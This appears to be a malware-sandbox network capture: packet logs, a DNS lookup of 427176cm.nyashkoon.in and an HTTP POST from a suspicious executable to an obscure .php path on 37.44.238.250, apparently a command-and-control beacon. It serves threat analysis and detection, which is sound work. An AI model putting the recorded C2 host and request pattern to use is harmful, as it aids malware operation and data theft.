                                        Nov 5, 2024 08:15:18.138233900 CET805018137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:18.192497969 CET5018180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:18.255335093 CET5018080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:18.255733967 CET5018180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:18.256144047 CET5018280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:18.260667086 CET805018037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:18.260715961 CET5018080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:18.261096001 CET805018137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:18.261109114 CET805018237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:18.261146069 CET5018180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:18.261188984 CET5018280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:18.261288881 CET5018280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:18.266172886 CET805018237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:18.617902040 CET5018280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:18.622890949 CET805018237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:19.064116955 CET805018237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:19.114742994 CET5018280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:19.141628027 CET805018237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:19.268105984 CET5018380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:19.273297071 CET805018337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:19.273442984 CET5018380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:19.273634911 CET5018380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:19.278491020 CET805018337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:19.303872108 CET5018280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:19.630055904 CET5018380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:19.634953976 CET805018337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:20.083507061 CET805018337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:20.147275925 CET5018380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:20.158582926 CET805018337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:20.284957886 CET5018380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:20.285829067 CET5018480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:20.290637016 CET805018337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:20.290694952 CET805018437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:20.290723085 CET5018380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:20.290754080 CET5018480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:20.290875912 CET5018480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:20.295816898 CET805018437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:20.648011923 CET5018480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:20.653120995 CET805018437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:21.125118017 CET805018437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:21.177320957 CET5018480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:21.198645115 CET805018437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:21.239923000 CET5018480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:21.314651012 CET5018480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:21.314680099 CET5018580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:21.319634914 CET805018537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:21.319744110 CET5018580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:21.319936991 CET805018437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:21.319967985 CET5018580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:21.320063114 CET5018480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:21.324767113 CET805018537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:21.676917076 CET5018580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:21.681807041 CET805018537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:22.160727978 CET805018537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:22.208084106 CET5018580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:22.236429930 CET805018537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:22.286211967 CET5018580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:22.362001896 CET5018580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:22.362349987 CET5018280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:22.362931013 CET5018680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:22.367367983 CET805018537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:22.367419004 CET5018580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:22.367887020 CET805018637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:22.368001938 CET5018680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:22.368093014 CET5018680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:22.373261929 CET805018637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:22.723854065 CET5018680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:23.068336010 CET5018680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:44.012718916 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:44.012792110 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:44.012916088 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:44.017726898 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:44.364679098 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:44.370224953 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:44.824490070 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:44.864811897 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.135524035 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:45.136142015 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:45.137803078 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.251781940 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.252454042 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.257081032 CET805021137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:45.257319927 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:45.257447004 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.257448912 CET5021180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.257715940 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.262567043 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:45.614449024 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:45.619544983 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.332475901 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.332500935 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.332509995 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.332570076 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.460295916 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.461133003 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.465679884 CET805021237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.465725899 CET5021280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.465941906 CET805021337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.465992928 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.466120958 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.470879078 CET805021337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:46.817748070 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:46.822949886 CET805021337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.309016943 CET805021337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.369744062 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.381144047 CET805021337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.396689892 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.396697998 CET5021480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.401714087 CET805021437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.402091980 CET805021337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.405817032 CET5021380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.405819893 CET5021480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.405930042 CET5021480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.410888910 CET805021437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.505806923 CET5021480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.506791115 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.511930943 CET805021537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.511990070 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.512125015 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.517644882 CET805021537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.553529978 CET805021437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.864427090 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:47.869406939 CET805021537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.997114897 CET805021437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:47.997175932 CET5021480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.325776100 CET805021537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:48.379925966 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.397937059 CET805021537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:48.442420006 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.533822060 CET5021080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.580833912 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.580841064 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.586008072 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:48.586112022 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.586355925 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.586628914 CET805021537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:48.586705923 CET5021580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.591459036 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:48.944761992 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:48.991518974 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.780615091 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.780632019 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.780646086 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.780720949 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.780770063 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.780822039 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.916565895 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.918061972 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.922100067 CET805021637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.922147989 CET5021680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.922986031 CET805021737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:49.923055887 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.923187017 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:49.928369045 CET805021737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:50.270653009 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.275698900 CET805021737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:50.739039898 CET805021737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:50.787730932 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.816824913 CET805021737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:50.864383936 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.940005064 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.940007925 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.944968939 CET805021837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:50.945838928 CET805021737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:50.947834015 CET5021780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.947907925 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.951725006 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:50.956578970 CET805021837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:51.303787947 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.308803082 CET805021837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:51.757915974 CET805021837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:51.801806927 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.835179090 CET805021837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:51.879915953 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.956991911 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.957775116 CET5021980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.962697983 CET805021837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:51.962754011 CET5021880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.962760925 CET805021937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:51.962825060 CET5021980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.962917089 CET5021980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:51.967802048 CET805021937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:52.317495108 CET5021980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.322426081 CET805021937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:52.521704912 CET5021980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.521713972 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.644028902 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.754337072 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:52.754371881 CET805022137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:52.754473925 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.754475117 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.754663944 CET805021937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:52.755140066 CET5021980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.765254974 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.765374899 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:52.770292997 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:52.770768881 CET805022137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.120685101 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.120815039 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.125710964 CET805022137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.125724077 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.125950098 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.566102982 CET805022137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.578624964 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.614278078 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.629901886 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.646162987 CET805022137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.651230097 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.692392111 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.692420959 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.769978046 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.770095110 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.770711899 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.775397062 CET805022037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.775448084 CET5022080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.775535107 CET805022237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.775599003 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.775717974 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.775732040 CET805022137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:53.775774956 CET5022180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:53.780750036 CET805022237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:54.129981041 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.135078907 CET805022237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:54.596484900 CET805022237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:54.645720959 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.683752060 CET805022237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:54.684295893 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.690469980 CET805022237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:54.692805052 CET5022280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.805721045 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.811012030 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:54.811110020 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.811218023 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:54.816126108 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.161716938 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.166779041 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.737735987 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.737755060 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.737763882 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.737823009 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.921580076 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.927047968 CET805022337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.927118063 CET5022380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.927778006 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.932791948 CET805022437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:55.932857990 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.933844090 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:55.938709974 CET805022437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:56.286221981 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.291234970 CET805022437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:56.752895117 CET805022437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:56.803786039 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.825397015 CET805022437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:56.879890919 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.938203096 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.939698935 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.943772078 CET805022437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:56.943948984 CET5022480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.944679022 CET805022537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:56.944824934 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.944883108 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:56.949692965 CET805022537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:57.303757906 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.308716059 CET805022537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:57.765079021 CET805022537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:57.817406893 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.842223883 CET805022537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:57.893122911 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.976691008 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.977427959 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.982110023 CET805022537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:57.982172012 CET5022580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.982239962 CET805022637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:57.982301950 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.982418060 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:57.987164021 CET805022637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.333089113 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.647824049 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.665692091 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.665699005 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.702671051 CET805022637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.702954054 CET805022637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.703167915 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.703290939 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.703375101 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.703617096 CET805022637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.703701973 CET5022680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.708257914 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.782375097 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.787416935 CET805022837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:58.787525892 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.787836075 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:58.792648077 CET805022837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.053700924 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.058881044 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.058897972 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.149691105 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.154839993 CET805022837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.518640995 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.567380905 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.595062971 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.608793974 CET805022837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.645535946 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.661165953 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.687133074 CET805022837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.739248991 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.813764095 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.813802958 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.814573050 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.819469929 CET805022937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.819482088 CET805022737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.819545031 CET5022780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.819550991 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.819674969 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.820317030 CET805022837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:15:59.820369959 CET5022880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:15:59.824883938 CET805022937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:00.176837921 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:00.181898117 CET805022937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:00.640836954 CET805022937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:00.692404985 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:00.720921040 CET805022937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:00.770513058 CET5022980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:00.843326092 CET5023080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:00.848212957 CET805023037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:00.848352909 CET5023080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:00.851711988 CET5023080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:00.856550932 CET805023037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:01.192512035 CET5023080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:16:01.197407961 CET805023037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:01.765459061 CET805023037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:16:01.765472889 CET805023037.44.238.250192.168.2.7
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Nov 5, 2024 08:12:17.709104061 CET | 60966 | 53 | 192.168.2.7 | 1.1.1.1
                                        Nov 5, 2024 08:12:17.719855070 CET | 53 | 60966 | 1.1.1.1 | 192.168.2.7
                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Nov 5, 2024 08:12:17.709104061 CET | 192.168.2.7 | 1.1.1.1 | 0xff71 | Standard query (0) | 427176cm.nyashkoon.in | A (IP address) | IN (0x0001) | false
                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Nov 5, 2024 08:12:17.719855070 CET | 1.1.1.1 | 192.168.2.7 | 0xff71 | No error (0) | 427176cm.nyashkoon.in | | 37.44.238.250 | A (IP address) | IN (0x0001) | false
                                        • 427176cm.nyashkoon.in
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.7 | 49745 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:17.737215042 CET | 310 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 336
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:18.547844887 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:18.646564007 CET | 1236 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:16 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 1300
                                        Connection: keep-alive
